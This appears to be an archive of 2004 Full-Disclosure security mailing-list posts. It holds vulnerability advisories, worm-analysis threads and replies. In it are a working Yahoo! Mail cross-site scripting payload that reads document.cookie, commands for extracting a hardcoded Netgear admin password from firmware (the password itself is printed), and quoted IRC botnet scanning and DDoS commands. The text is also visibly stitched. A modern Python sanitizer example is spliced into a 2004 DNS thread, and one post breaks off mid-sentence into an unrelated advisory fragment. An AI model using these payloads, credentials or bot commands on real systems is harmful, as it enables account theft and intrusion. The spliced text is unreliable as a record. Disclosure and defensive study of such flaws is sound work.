Web-based email services and Yahoo! specifically make tremendous efforts to sanitize incoming emails from potentially unsafe HTML content. Flawed filtering of such unsafe content may result in severe consequences that would occur as soon as a user opens an email for reading, including:

* Theft of login and password.
* Content disclosure of any email in the mailbox.
* Automatically sending emails from the mailbox.
* Exploitation of known vulnerabilities in the browser to access the user's file system and eventually take over the machine.
* Distribution of a web-based email worm.
* Disclosure of all contacts within the address book.

Discussion:
===========

GreyMagic discovered that by sending a maliciously formed email to a Yahoo! user it is possible to circumvent the filter and execute script in the context of a logged-in Yahoo! user.

A known Cross-Site Scripting weakness is using entities instead of actual chars, for example: "javascript:alert()". There is also a variation of that weakness, caused by the way browsers ignore white-space chars in URLs: "java script:alert()". Yahoo! properly filters both of these scenarios.

However, a third variation remains unfiltered. It is possible to embed a javascript URL by using a white-space entity with multiple zero chars in front of it: "java script:alert()".

Exploit:
========

The following HTML embedded in an email would show a Yahoo!
user's cookie when opened:
Hel lo!
Solution:
=========

GreyMagic informed Yahoo! of the vulnerability on 20-May-2004. Yahoo! responded promptly and reported that it patched the vulnerability on 24-May-2004.

Tested on:
==========

Yahoo! web-based email service.

Disclaimer:
===========

The information in this advisory and any of its demonstrations is provided "as is" without warranty of any kind.

GreyMagic Software is not liable for any direct or indirect damages caused as a result of using the information or demonstrations provided in any part of this advisory.

- Copyright © 2004 GreyMagic Software.

From security at greymagic.com Thu Jun 3 14:53:59 2004
From: security at greymagic.com (GreyMagic Software)
Date: Thu, 3 Jun 2004 15:53:59 +0200
Subject: [Full-Disclosure] Phishing for Opera (GM#007-OP)
Message-ID: <20040603125216.051B8FC42D@marco.bezeqint.net>

GreyMagic Security Advisory GM#007-OP
=====================================

By GreyMagic Software, 03 Jun 2004.

Available in HTML format at http://security.greymagic.com/security/advisories/gm007-op/.

Topic: Phishing for Opera.

Discovery date: 16 May 2004.

Affected applications:
======================

Opera 7.50 and prior.

Introduction:
=============

Most browsers today implement a "Shortcut Icon" (favicon) feature. This feature gives web-sites the option to add a small icon to the address bar and/or favorites. Opera also implements this feature. However, unlike other browsers, Opera allows the use of icons that may be large in width.

Discussion:
===========

It is possible to use this feature in Opera to fool users into believing that they are in a domain they trust (their bank, web-mail, etc) while serving and receiving content in a hostile domain, thereby enabling identity theft, credit card scams and more.

This can be done by creating an icon that contains the text of the desired site, which would be similar in appearance to the way Opera shows addresses in the address bar.

This alone, however, is not enough, as it will cause the real address to appear to the right of the fake address. Unfortunately, this too can be circumvented by tricking Opera into showing the right-hand side of the attacking URL, while filling that side with spaces. The result is a very convincing fake address appearing in the address bar.

Exploit:
========

Create an image that looks like an address in Opera's address bar and use the following element to include it in a page:

Demonstration:
==============

A proof-of-concept demonstration of this issue is available at http://security.greymagic.com/security/advisories/gm007-op/.

Solution:
=========

GreyMagic informed Opera of the vulnerability on 19-May-2004. A new version (7.51) was released on 03-Jun-2004 to address this problem.

Tested on:
==========

Opera 7.23.
Opera 7.50.

Disclaimer:
===========

The information in this advisory and any of its demonstrations is provided "as is" without warranty of any kind.

GreyMagic Software is not liable for any direct or indirect damages caused as a result of using the information or demonstrations provided in any part of this advisory.

- Copyright © 2004 GreyMagic Software.

From _ at r4k.net Thu Jun 3 14:50:04 2004
From: _ at r4k.net (Stephanie Wehner)
Date: Thu, 3 Jun 2004 15:50:04 +0200
Subject: [Full-Disclosure] analysis (more worms wanted :) )
Message-ID: <20040603135003.GQ50382@r4k.net>

Hi,

First of all, thanks to everyone who provided me with worms as a response to my last email.

So far I have analyzed the executables (or scripts) of worms, where my aim was to determine the family of an unknown worm. (Different versions of the same worm form a family.) This worked quite well; for example, for Sasser D as input, it was easy to tell that it belongs to the Sasser family. You can view some pictures at http://www.cwi.nl/~wehner/worms, where you can also find more information about the approach I used. Note that this is *work in progress*.
I'm looking for more worms to analyze. Unfortunately I don't have any lab setup/multiple machines/IPs to collect them easily. (This is a fun project, my main area of research lies elsewhere.)

I have also looked at network traffic, which works quite well for general traffic. I will post more about this on my webpage in the near future. However, I am now especially looking for traffic generated by worms. :)

Thanks,
Stephanie

--<> _ at r4k.net <>------------------<> FreeBSD <>-------------------
#3 - Anime Law of Sonic Amplification, First Law of Anime Acoustics
In space, loud sounds, like explosions, are even louder because there is no air to get in the way.

From SkyLined at edup.tudelft.nl Thu Jun 3 15:12:49 2004
From: SkyLined at edup.tudelft.nl (Berend-Jan Wever)
Date: Thu, 3 Jun 2004 16:12:49 +0200
Subject: [Full-Disclosure] Simple Yahoo! Mail Cross-Site Scripting (GM#006-MC)
References: <20040603125050.6E270FC0C3@bela.bezeqint.net>
Message-ID: <000701c44974$da2db8c0$0100a8c0@grotedoos>

When I was into finding XSS, I found holes in just about every web-based email provider with relative ease... The only one that I found was pretty hardened was Hotmail (probably because everyone is trying to find holes all the time). I bet this is still just the tip of the iceberg for Yahoo, keep up the good work.

Oh, here's one I found a long time ago (Yahoo), they probably fixed it by now, but I haven't checked:

BTW. Long time no advisory, guys. I thought you had quit... What have you been up to?

Cheers,
SkyLined

----- Original Message -----
From: "GreyMagic Software"
To:
Sent: Thursday, June 03, 2004 15:52
Subject: [Full-Disclosure] Simple Yahoo! Mail Cross-Site Scripting (GM#006-MC)

> GreyMagic Security Advisory GM#006-MC
> =====================================
>
> GreyMagic Software, 03 Jun 2004.
>
> Available in HTML format at
> http://www.greymagic.com/security/advisories/gm006-mc/.
>
> Topic: Simple Yahoo! Mail Cross-Site Scripting.
>
> Discovery date: 16 May 2004.
> > Affected applications: > ====================== > > * Yahoo! web-based email service. > > > Introduction: > ============= > > Web-based email services and Yahoo! specifically make tremendous efforts to > sanitize incoming emails from potentially unsafe HTML content. Flawed > filtering of such unsafe content may result in severe consequences that > would occur as soon as a user opens an email for reading, including: > > * Theft of login and password. > * Content disclosure of any email in the mailbox. > * Automatically send emails from the mailbox. > * Exploitation of known vulnerabilities in the browser to access the user's > file system and eventually take over the machine. > * Distribution of a web-based email worm. > * Disclosure of all contacts within the address book. > > > Discussion: > =========== > > GreyMagic discovered that by sending a maliciously formed email to a Yahoo > user it is possible to circumvent the filter and execute script in the > context of a logged-in Yahoo! user. > > A known Cross-Site Scripting weakness is using entities instead of actual > chars, for example: "javascript:alert()". There is also a variation of > that weakness, caused by the way browsers ignore white-space chars in URLs: > "java script:alert()". Yahoo! properly filters both of these scenarios. > > However, a third variation remains unfiltered. It is possible to embed a > javascript URL by using a white-space entity with multiple zero chars in > front of it: "java script:alert()". > > > Exploit: > ======== > > The following HTML embedded in an email would show a Yahoo! user's cookie > when opened: > >
style="background-image:url(jav ascript:alert(document.cookie))">Hel > lo!
> > > Solution: > ========= > > GreyMagic informed Yahoo! of the vulnerability on 20-May-2004. Yahoo! > responded promptly and reported that it patched the vulnerability on > 24-May-2004. > > > Tested on: > ========== > > Yahoo! web-based email service. > > > Disclaimer: > =========== > > The information in this advisory and any of its demonstrations is provided > "as is" without warranty of any kind. > > GreyMagic Software is not liable for any direct or indirect damages caused > as a result of using the information or demonstrations provided in any part > of this advisory. > > - Copyright © 2004 GreyMagic Software. > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.netsys.com/full-disclosure-charter.html From fulldisc at sun.consumer.org.il Thu Jun 3 15:35:22 2004 From: fulldisc at sun.consumer.org.il (Shachar Shemesh) Date: Thu, 03 Jun 2004 17:35:22 +0300 Subject: [Full-Disclosure] Strange TCP/IP DNS traffic Message-ID: <40BF372A.2040505@sun.consumer.org.il> Hi all, A few days ago I started seeing outbound TCP connections on port 53, aimed at the .com NS servers. These were blocked by the firewall. I realize that this does not violate any RFC, but it's still unusual. The outbound traffic is not generated by the local bind installation, which was asked to bind to port 53 for outbound traffic. Also, /etc/resolv.conf lists 127.0.0.1 as the nameserver, so as far as I understand such traffic should not be initiated by user programs. Does anyone have any idea what that may be? 
Shachar -- Shachar Shemesh Lingnu Open Source Consulting http://www.lingnu.com/ From nils at druecke.strg-alt-entf.org Thu Jun 3 16:29:25 2004 From: nils at druecke.strg-alt-entf.org (Nils Ketelsen) Date: Thu, 3 Jun 2004 11:29:25 -0400 Subject: [Full-Disclosure] Strange TCP/IP DNS traffic In-Reply-To: <40BF372A.2040505@sun.consumer.org.il> References: <40BF372A.2040505@sun.consumer.org.il> Message-ID: <20040603152925.GA12352@bug> On Thu, Jun 03, 2004 at 05:35:22PM +0300, Shachar Shemesh wrote: > The outbound traffic is not generated by the local bind installation, > which was asked to bind to port 53 for outbound traffic. Also, > /etc/resolv.conf lists 127.0.0.1 as the nameserver, so as far as I > understand such traffic should not be initiated by user programs. > > Does anyone have any idea what that may be? Easiest guess: Some user doing a host or nslookup or something, by hand choosing to send it to the nameserver the packets are targeted to. Something like "host -t ns microsoft.com H.GTLD-SERVERS.NET" Or some stupid application not using the gethostbyname system call but rather implementing it itself. There are some people out there believing they can do it better than the system call. Most of them screwed it up. Nils -- Nils Ketelsen // Mississauga, Canada 43° 35' 13"N, 79° 38' 23"W mailto:`#!/bin/sh`@druecke.strg-alt.entf.org http://druecke.strg-alt-entf.org/ From full-disclosure at nym.hush.com Thu Jun 3 16:49:23 2004 From: full-disclosure at nym.hush.com (full-disclosure at nym.hush.com) Date: Thu, 3 Jun 2004 08:49:23 -0700 Subject: [Full-Disclosure] Strange TCP/IP DNS traffic Message-ID: <200406031549.i53FnO46016148@mailserver3.hushmail.com> > Also, /etc/resolv.conf lists 127.0.0.1 as the nameserver, so > as far as I understand such traffic should not be initiated > by user programs. It sounds like named is running on your computer. Depending on your OS, netstat -anp might show you which application initiated the requests. 
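The GreyMagic Yahoo! Mail advisory quoted above turns on a single normalization step the filter skipped: a numeric character reference with extra leading zeros (java&#0009;script:) decodes to the same tab as &#09;, and the browser then ignores that tab inside the scheme. The Python below is an added example, not Yahoo!'s filter and not GreyMagic's code: a hypothetical pattern-matching denylist of the kind the advisory describes, beside a hardened check that decodes references, strips control characters and only then compares the scheme against an allowlist, for href/src values and for url() inside a style attribute.

```python
"""Scheme check for user-supplied HTML attribute values.

Added example for the GM#006-MC finding (a javascript: URL hidden behind a
numeric character reference with extra leading zeros). The naive filter is a
hypothetical reconstruction of a pattern-based denylist; nothing here is
Yahoo!'s or GreyMagic's code.
"""
import re
from html import unescape

# Hypothetical denylist of the spellings a filter author has seen so far
# (the advisory says the plain and the &#09; forms were already blocked).
NAIVE_DENYLIST = ("javascript:", "java&#9;script:", "java&#09;script:")


def naive_is_blocked(raw_value: str) -> bool:
    """Pattern-matching filter that never decodes the attribute value."""
    lowered = raw_value.lower()
    return any(pattern in lowered for pattern in NAIVE_DENYLIST)


def decode_attribute(raw_value: str) -> str:
    """Decode character references the way the HTML tokenizer does.

    html.unescape parses &#0009; and &#x0009; to the same U+0009 as &#9;,
    so extra leading zeros cannot produce a different string.
    """
    return unescape(raw_value)


def strip_controls(url: str) -> str:
    """Drop ASCII control characters and spaces, which browsers tolerate
    inside a URL scheme (the 'java<TAB>script:' variant)."""
    return "".join(ch for ch in url if ord(ch) > 0x20)


# A scheme is letters/digits/+.- up to the first colon; a relative URL such
# as "inbox?id=3" or "a/b:c" has no scheme and is left alone.
_SCHEME = re.compile(r"^([A-Za-z][A-Za-z0-9+.-]*):")
ALLOWED_SCHEMES = frozenset({"http", "https"})

# Hypothetical CSS url() extractor for style attributes, enough for the
# advisory's background-image case (quoted or unquoted argument).
_CSS_URL = re.compile(r"url\(\s*(['\"]?)(.*?)\1\s*\)", re.IGNORECASE | re.DOTALL)


def extract_urls(attr_name: str, decoded_value: str) -> list:
    """Return every URL the attribute carries after reference decoding."""
    if attr_name.lower() == "style":
        return [m.group(2) for m in _CSS_URL.finditer(decoded_value)]
    return [decoded_value]


def normalize_url(raw_value: str) -> str:
    """Decode then strip: the string the browser will actually interpret."""
    return strip_controls(decode_attribute(raw_value))


def scheme_allowed(url: str) -> bool:
    match = _SCHEME.match(url)
    if match is None:
        return True  # relative URL, no scheme to abuse
    return match.group(1).lower() in ALLOWED_SCHEMES


def is_safe_attribute(attr_name: str, raw_value: str) -> bool:
    """Hardened check: normalize first, compare against an allowlist last."""
    decoded = decode_attribute(raw_value)
    return all(scheme_allowed(strip_controls(u))
               for u in extract_urls(attr_name, decoded))


if __name__ == "__main__":
    # Constructed inputs: the three spellings from the advisory plus the
    # style-attribute form of its proof of concept.
    samples = [
        ("href", "javascript:alert(1)"),
        ("href", "java&#09;script:alert(1)"),
        ("href", "java&#0009;script:alert(1)"),  # slips past the denylist
        ("style", "background-image:url(jav&#09;ascript:alert(document.cookie))"),
        ("href", "https://mail.example.test/inbox?id=3"),
    ]
    for name, value in samples:
        print(f"{name}={value!r}: denylist blocks={naive_is_blocked(value)}, "
              f"hardened accepts={is_safe_attribute(name, value)}")
```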
From list at rachinsky.de Thu Jun 3 17:06:40 2004 From: list at rachinsky.de (Nicolas Rachinsky) Date: Thu, 3 Jun 2004 18:06:40 +0200 Subject: [Full-Disclosure] Strange TCP/IP DNS traffic In-Reply-To: <40BF372A.2040505@sun.consumer.org.il> References: <40BF372A.2040505@sun.consumer.org.il> Message-ID: <20040603160640.GA58170@pc5.i.0x5.de> * Shachar Shemesh [2004-06-03 17:35 +0300]: > The outbound traffic is not generated by the local bind installation, > which was asked to bind to port 53 for outbound traffic. Also, man named.conf: Query Address If the server doesn't know the answer to a question, it will query other nameservers. query-source specifies the address and port used for such queries. If address is * or is omitted, a wildcard IP address ( INADDR_ANY) will be used. If port is * or is omitted, a random unprivileged port will be used. The default is query-source address * port *; Note: query-source currently applies only to UDP queries; TCP queries always use a wildcard IP address and a random unprivileged port. From fulldis at frenchfries.net Thu Jun 3 17:11:59 2004 From: fulldis at frenchfries.net (fulldis at frenchfries.net) Date: Thu, 3 Jun 2004 09:11:59 -0700 (PDT) Subject: [Full-Disclosure] Format String Vulnerability in Tripwire In-Reply-To: <20040602234116.9A3674A5B@frenchfries.net> References: <20040602234116.9A3674A5B@frenchfries.net> Message-ID: <20040603161159.C86804A72@frenchfries.net> On Wed, 2 Jun 2004, Paul Herman wrote: > VERSIONS AFFECTED > ----------------- > Tripwire commercial versions <= 2.4 > [...] Typo. That should be '4.2' and not '2.4'. -Paul. From clarke at craftedpackets.net Thu Jun 3 17:24:33 2004 From: clarke at craftedpackets.net (clarke at craftedpackets.net) Date: Thu, 3 Jun 2004 12:24:33 -0400 Subject: [Full-Disclosure] Using Xbox live for covert communication Message-ID: <200406031624.BQF64929@ms2.netsolmail.com> Recently, I subscribed to Xbox live. 
After playing on some of the games online, I thought that this is a perfect place for covert communication. Their rooms aren't monitored. You can open up private rooms and communicate with invited friends. Who knows... :-) From 1 at malware.com Thu Jun 3 17:28:39 2004 From: 1 at malware.com (http-equiv@excite.com) Date: Thu, 3 Jun 2004 16:28:39 -0000 Subject: [Full-Disclosure] TREND MICRO: The Protector Becomes The Vector [technical exercise: cross-application-scripting] Message-ID: <200406031628.i53GSdc0023610@web120.megawebservers.com> Thursday, June 03, 2004 The following represents an interesting technical examination when the so-called "Anti-Virus" protector becomes the Virus "Vector". Naturally this is the result of relying on the "plug and play" or "module" of one Internet Explorer browser and operating system from a product "innovator" called Microsoft. Trend Micro [ http://www.trendmicro.com ], a purveyor of gadgetry designed to 'protect' the little people on the Information Super Highway from a seemingly endless stream of traffic of obstacles collectively known as "malware", has a very nice little apparatus to achieve this. The "Trend Micro Internet Security model no. 1120 1311 engine version: 7.100" with all the bells and whistles. Lengthy examination confirms that it does its job and it does its job quite well. However: For whatever inexplicable reason, it [and perhaps others] relies on the time-tested insecure device known as the Microsoft Internet Explorer. It uses this incredible derelict 'thing' to generate its reports; that is when the "Anti-Virus" gadget encounters an opponent, the "malware" of the day, it alerts and indicates precisely what the problem is. Sounds Good: Knowing what it uses and where it uses it, we then have to work backwards and devise a method to 'cross-application-scripting' our arbitrary code into the device in order to coax it to do our work for us. Specifically: 1. 
When the product alerts it creates an html file in the temporary file of the user's machine [the so-called "local zone"] [screen shot: http://www.malware.com/weallcar.png 29KB ] This html file is viewed from an Internet Explorer "browser object" and indicates what file is problematic. 2. Technically [so far] in order to make use of all of this we need to name our problematic file a suitable name with suitable html tags to render as we require. At present the actual browser and operating system automatically filter this { http://x.x.x.x:7080/ ================ snip ======================== SOLUTION ======== Vendor contacted May 16, 2003 support-surgemail at netwinsite.com Vendor acknowledgement received May 17, 2003 Vendor Patch / Version 2.0c released June 2, 2004 and may be obtained at ftp://ftp.netwinsite.com/pub/surgemail/beta http://www.netwinsite.com/surgemail/help/updates.htm PROOF OF CONCEPT ================ ( see DETAILS ) CREDITS ======= This vulnerability was discovered and researched by Donnie Werner of exploitlabs mail: morning_wood at exploitlabs.com -- web: http://exploitlabs.com web: http://zone-h.org ref: http://zone-h.org/en/advisories/read/id=4714/ ref: http://exploitlabs.com/files/advisories/EXPL-A-2004-002-surgmail.txt From PerrymonJ at bek.com Thu Jun 3 20:45:11 2004 From: PerrymonJ at bek.com (Perrymon, Josh L.) Date: Thu, 3 Jun 2004 14:45:11 -0500 Subject: [Full-Disclosure] anyone seen this worm/trojan before? Message-ID: <5E1F351F4AE1D611A7FE00B0D0AB064A02353292@is6b> I read the link below and noticed that this worm must be a variant because the .exe is not the same and I don't notice any means of network scanning or propagation. JP -----Original Message----- From: Harlan Carvey [mailto:keydet89 at yahoo.com] Sent: Thursday, June 03, 2004 2:25 PM To: full-disclosure at netsys.com Cc: Perrymon, Josh L. Subject: Re: [Full-Disclosure] anyone seen this worm/trojan before? 
Josh, I tried to download the archive, and McAfee alerted me to "W32/Sdbot.worm.gen.g". From: http://www.sophos.com/virusinfo/analyses/w32sdbotcf.html "W32/SdBot-CF spreads to other computers on the local network protected by weak passwords." > I found this worm/ trojan on a laptop. Ran FPort and > found the .exe. I checked out your web site...don't you think that the information you found via fport would be useful to others, such as the port, etc? > Doesn't look like it propagates to other machines > but rather communicates > with a compromised > web companies server using IRC. The compromised > server has removed the IRC > service. Only sends RST packets back. > > I put it on my site. > > http://www.packetfocus.com/analysis.htm > > I would like to know the attack vectors. I'm > guessing LSASS. From etomcat at freemail.hu Thu Jun 3 21:02:04 2004 From: etomcat at freemail.hu (Feher Tamas) Date: Thu, 3 Jun 2004 22:02:04 +0200 (CEST) Subject: [Full-Disclosure] Re: anyone seen this worm/trojan before? Message-ID: Hello, >http://www.packetfocus.com/analysis/wkssvrs.zip Kaspersky AV says: "Backdoor.RBot.gen" malware Virus description: "http://uk.trendmicro-europe.com/enterprise/security_info/ve_detail.php?id=59366&VName=BKDR_RBOT.A" Try the above URL with RBOT_n (n = B,C,D,E, etc.) ending for more variants. The fact that it is identified as "something.GEN" means it is likely a new RBot variant, identified with antivirus heuristics. Sincerely: Tamas Feher. From PerrymonJ at bek.com Thu Jun 3 21:02:31 2004 From: PerrymonJ at bek.com (Perrymon, Josh L.) Date: Thu, 3 Jun 2004 15:02:31 -0500 Subject: [Full-Disclosure] anyone seen this worm/trojan before? Message-ID: <5E1F351F4AE1D611A7FE00B0D0AB064A02353295@is6b> After thinking about it and discussing with a friend- It makes sense that it doesn't try to propagate until it connects to an IRC server. That way you don't have a lot of machines hitting the compromised IRC server after it has been taken down. 
I'm working on setting up IRCD on my BSD box in my VMWARE lab and seeing what it does. I will also send the fport info. I *did notice the same ports open as the korgo worm. It also sends from sequential source ports to the IRC compromised host. JP -----Original Message----- From: Perrymon, Josh L. Sent: Thursday, June 03, 2004 2:41 PM To: 'insecure'; Perrymon, Josh L. Cc: full-disclosure at netsys.com Subject: RE: [Full-Disclosure] anyone seen this worm/trojan before? I was guessing about LSASS because that was the only patch not on the box that was infected. The user also had a pass with a couple #'s in it so I didn't think it would be found in a password list. After watching it for a while I *Never saw it try to propagate to another machine. That's what was weird. So how would he get it the first time? I had to infect him some way... But there were no other traces of it on the network... If I have some time I'll post the FPort data and some clean packet captures. JP -----Original Message----- From: insecure [mailto:insecure at ameritech.net] Sent: Thursday, June 03, 2004 2:27 PM To: Perrymon, Josh L. Cc: full-disclosure at netsys.com Subject: Re: [Full-Disclosure] anyone seen this worm/trojan before? Perrymon, Josh L. wrote: >I found this worm/ trojan on a laptop. Ran FPort and found the .exe. >Doesn't look like it propagates to other machines but rather communicates >with a compromised >web companies server using IRC. The compromised server has removed the IRC >service. Only sends RST packets back. > >I put it on my site. > >http://www.packetfocus.com/analysis.htm > >I would like to know the attack vectors. I'm guessing LSASS. > >Joshua Perrymon >PGP Fingerprint >51B8 01AC E58B 9BFE D57D 8EF6 C0B2 DECF EC20 6021 > > > McAfee VirusScan 7.1 with 4364 DAT detects it as W32/Sdbot.worm.gen.g. Other than that, they have no information besides that they first noticed it on 5/26/2004. 
It may spread through lsass, but this type of worm is usually limited to spreading through network shares with weak password protection. Jerry From lupe at lupe-christoph.de Thu Jun 3 23:03:13 2004 From: lupe at lupe-christoph.de (Lupe Christoph) Date: Fri, 4 Jun 2004 00:03:13 +0200 Subject: [Full-Disclosure] Re: Netgear WG602 Accesspoint vulnerability In-Reply-To: References: Message-ID: <20040603220313.GB2307@lupe-christoph.de> On Thursday, 2004-06-03 at 19:35:22 +0200, Tom Knienieder wrote: > Possibly vulnerable (not verified) > WG602 with other Firmware Versions > WG602v2 The WG602v2 uses different firmware. > Download the WG602 Version 1.5.67 firmware from Netgear > ( http://kbserver.netgear.com/support_details.asp?dnldID=366 ) WG602v2 Firmware Version 2.0RC5: http://kbserver.netgear.com/support_details.asp?dnldID=504 WG602v2 Repeater Firmware Version 3.2 RC6 http://kbserver.netgear.com/support_details.asp?dnldID=692 > and run the following shell commands on a UNIX box: > $ dd if=wg602_1.5.67_firmware.img bs=1 skip=425716 > rd.img.gz > $ zcat rd.img.gz | strings | grep -A5 -B5 5777364 2.0RC5 dd if=apfirmware_2.0rc5.img bs=1 skip=111596 of=rd.img.bz2 3.2 RC6 unzip wg602_v2_apfirmware_3.2rc6.zip dd if=apfirmware_3.2rc6.img bs=1 skip=112620 of=rd.img.bz2 In both cases this: bzcat rd.img.bz2 | strings | egrep 'Authorization|BASIC|super|5777364' Returns some garbage, but nothing similar to your output. Also logging in with super/5777364 does not work with my unit (unknown firmware release - I forgot the password and have to reset the unit. But it's getting a little late here.) HTH, Lupe Christoph -- | lupe at lupe-christoph.de | http://www.lupe-christoph.de/ | | "... putting a mail server on the Internet without filtering is like | | covering yourself with barbecue sauce and breaking into the Charity | | Home for Badgers with Rabies. 
Michael Lucas | From api at epost.de Thu Jun 3 23:08:23 2004 From: api at epost.de (Axel Pettinger) Date: Fri, 04 Jun 2004 00:08:23 +0200 Subject: [Full-Disclosure] anyone seen this worm/trojan before? References: <5E1F351F4AE1D611A7FE00B0D0AB064A0235328C@is6b> Message-ID: <40BFA157.74EA20E1@epost.de> "Perrymon, Josh L." wrote: > > I found this worm/ trojan on a laptop. Ran FPort and found the .exe. > Doesn't look like it propagates to other machines but rather communicates > with a compromised > web companies server using IRC. The compromised server has removed the IRC > service. Only sends RST packets back. > > I would like to know the attack vectors. I'm guessing LSASS. AntiVirus scanners identify our trojan as: BitDefender : Backdoor.SDBot.Gen Kaspersky : Backdoor.Rbot.gen McAfee : W32/Sdbot.worm.gen.g Symantec : W32.Spybot.Worm Trend Micro : WORM_SPYBOT.AP From a quick look at the file I'd say the following is the best description of that trojan. There're several attack vectors ... 
http://www.trendmicro.com/vinfo/virusencyclo/default5.asp?VName=WORM_SPYBOT.AP&VSect=T Regards, Axel Pettinger From security at linux-mandrake.com Thu Jun 3 23:14:28 2004 From: security at linux-mandrake.com (Mandrake Linux Security Team) Date: 3 Jun 2004 22:14:28 -0000 Subject: [Full-Disclosure] MDKSA-2004:056 - Updated krb5 packages fix buffer overflow vulnerabilities Message-ID: <20040603221428.15419.qmail@updates.mandrakesoft.com> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 _______________________________________________________________________ Mandrakelinux Security Update Advisory _______________________________________________________________________ Package name: krb5 Advisory ID: MDKSA-2004:056 Date: June 3rd, 2004 Affected versions: 10.0, 9.1, 9.2, Corporate Server 2.1, Multi Network Firewall 8.2 ______________________________________________________________________ Problem Description: Multiple buffer overflows exist in the krb5_aname_to_localname() library function that if exploited could lead to unauthorized root privileges. In order to exploit this flaw, an attacker must first successfully authenticate to a vulnerable service, which must be configured to enable the explicit mapping or rules-based mapping functionality of krb5_aname_to_localname, which is not a default configuration. Mandrakesoft encourages all users to upgrade to these patched krb5 packages. 
_______________________________________________________________________ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0523 http://web.mit.edu/kerberos/advisories/MITKRB5-SA-2004-001-an_to_ln.txt ______________________________________________________________________ Updated Packages: Mandrakelinux 10.0, Mandrakelinux 10.0/AMD64, Corporate Server 2.1, Corporate Server 2.1/x86_64, Mandrakelinux 9.1, Mandrakelinux 9.1/PPC, Mandrakelinux 9.2, Mandrakelinux 9.2/AMD64, Multi Network Firewall 8.2. _______________________________________________________________________ To upgrade automatically use MandrakeUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandrakesoft for security. 
You can obtain the GPG public key of the Mandrakelinux Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandrakelinux at: http://www.mandrakesoft.com/security/advisories If you want to report vulnerabilities, please contact security_linux-mandrake.com Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Linux Mandrake Security Team -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.7 (GNU/Linux) iD8DBQFAv6LEmqjQ0CJFipgRAmP2AJ9yz70XbcN/fd6EjyQcyQbyoddqEACg59bD 1nsN3/ilgIlGelRpvf4eJqw= =EigO -----END PGP SIGNATURE----- From jim at becher.net Fri Jun 4 04:27:58 2004 From: jim at becher.net (Jim Becher) Date: Thu, 3 Jun 2004 22:27:58 -0500 Subject: [Full-Disclosure] anyone seen this worm/trojan before? In-Reply-To: <20040603192614.82582.qmail@web51510.mail.yahoo.com> Message-ID: I have seen a little of this worm/trojan as well... same IP, Unreal v3.2 IRC server. I am leaning to the same conclusion as Josh. Note: I said leaning, not completely convinced. I have seen in the IRC traffic some references to lsass, including what I think might be the command-line to instruct the infected machine to commence scanning -- "advscan lsass 100 5 1000 -b -r -s". Haven't had a chance to look at the executable with any detail yet... Also noticed this in the IRC traffic: "There are 1 users and 19496 invisible on 1 servers" and "ddos.random 10003 60 -s". I am not overly familiar with IRC servers, so I am reviewing RFC2811 and Brocklesby's draft trying to understand the IRC traffic. We submitted our copy of wkssvrs.exe to Symantec, yesterday I believe. -bech -----Original Message----- From: full-disclosure-admin at lists.netsys.com [mailto:full-disclosure-admin at lists.netsys.com]On Behalf Of Harlan Carvey Sent: Thursday, June 03, 2004 2:26 PM To: full-disclosure at netsys.com Cc: Perrymon, Josh L. Subject: Re: [Full-Disclosure] anyone seen this worm/trojan before? 
Josh, > I would like to know the attack vectors. I'm > guessing LSASS. If you don't know what the worm is, what would lead you to guess that the infection vector is LSASS? Is there some other piece of information that you're not sharing? _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html From WEHNERPL at UCMAIL.UC.EDU Fri Jun 4 13:05:53 2004 From: WEHNERPL at UCMAIL.UC.EDU (Wehner, Paul (wehnerpl)) Date: Fri, 4 Jun 2004 08:05:53 -0400 Subject: [Full-Disclosure] Using Xbox live for covert communication Message-ID: <9BA6DCC15456CC46894E77233173DD7C157A3905@UCMAIL5> Then why not find a friend in germany and pretend to plan a biological attack? See how "un-monitored" and "private" it is then-:) -----Original Message----- From: clarke at craftedpackets.net [mailto:clarke at craftedpackets.net] Sent: Thursday, June 03, 2004 12:25 PM To: full-disclosure at netsys.com Subject: [Full-Disclosure] Using Xbox live for covert communication Recently, I subscribed to Xbox live. After playing on some of the games online, I thought that this is a perfect place for covert communication. Their rooms aren't monitored. You can open up private rooms and communicate with invited friends. Who knows... :-) _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html From dave at immunitysec.com Fri Jun 4 15:03:18 2004 From: dave at immunitysec.com (Dave Aitel) Date: Fri, 04 Jun 2004 10:03:18 -0400 Subject: [Full-Disclosure] NYC Security Shindig Version 2 (with punch and pie!) Message-ID: <40C08126.3090507@immunitysec.com> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 New York City Security Shindig 2 Security Shindigs are ways for technical people in the Information Security industry to get together, view an informative technical presentation, and otherwise have a good time. 
Date/Time: Monday June 14th, 6pm Location: Two Boots "Den of Cin" http://www.twoboots.com/theden/ 44 Avenue A (at E 3rd Street) underneath Two Boots Video. Speaker/Topic: Jamie Butler. Kernel Rootkits. I've seen the slidepack, and it was extremely interesting if you're interested in kernel rootkits, which you should be. It focuses on Win32, but touches on Linux. Jamie teaches a class on the subject that has gotten nothing but good reviews, so you should welcome this free chance to see what he's got going on. I've been told there will be demonstrations and other excitement. Extras: Free Soda and Pizza (toppings extra). Cash bar. Potential book raffle! Sponsor: Immunity, Inc. (www.immunitysec.com) RSVP Contact: Dave Aitel - dave at immunitysec.com Check the Daily Dave mailing list for updates and further information! -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.2.1 (GNU/Linux) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iD8DBQFAwIElzOrqAtg8JS8RAsbqAJ98Y+Mx+/rhxwhBYeQV1SKIeGvQ6wCeIgvV /LtVWnzTk3wwKUHc8iD9Ua4= =nO5v -----END PGP SIGNATURE----- From alerts at integrigy.com Fri Jun 4 18:55:52 2004 From: alerts at integrigy.com (Integrigy Security) Date: Fri, 4 Jun 2004 12:55:52 -0500 Subject: [Full-Disclosure] Integrigy Security Alert - Multiple SQL Injection Vulnerabilities in Oracle E-Business Suite Message-ID: <20040604175702.9071E4153@mail.integrigy.com> ______________________________________________________________________ Integrigy Security Alert ______________________________________________________________________ Oracle 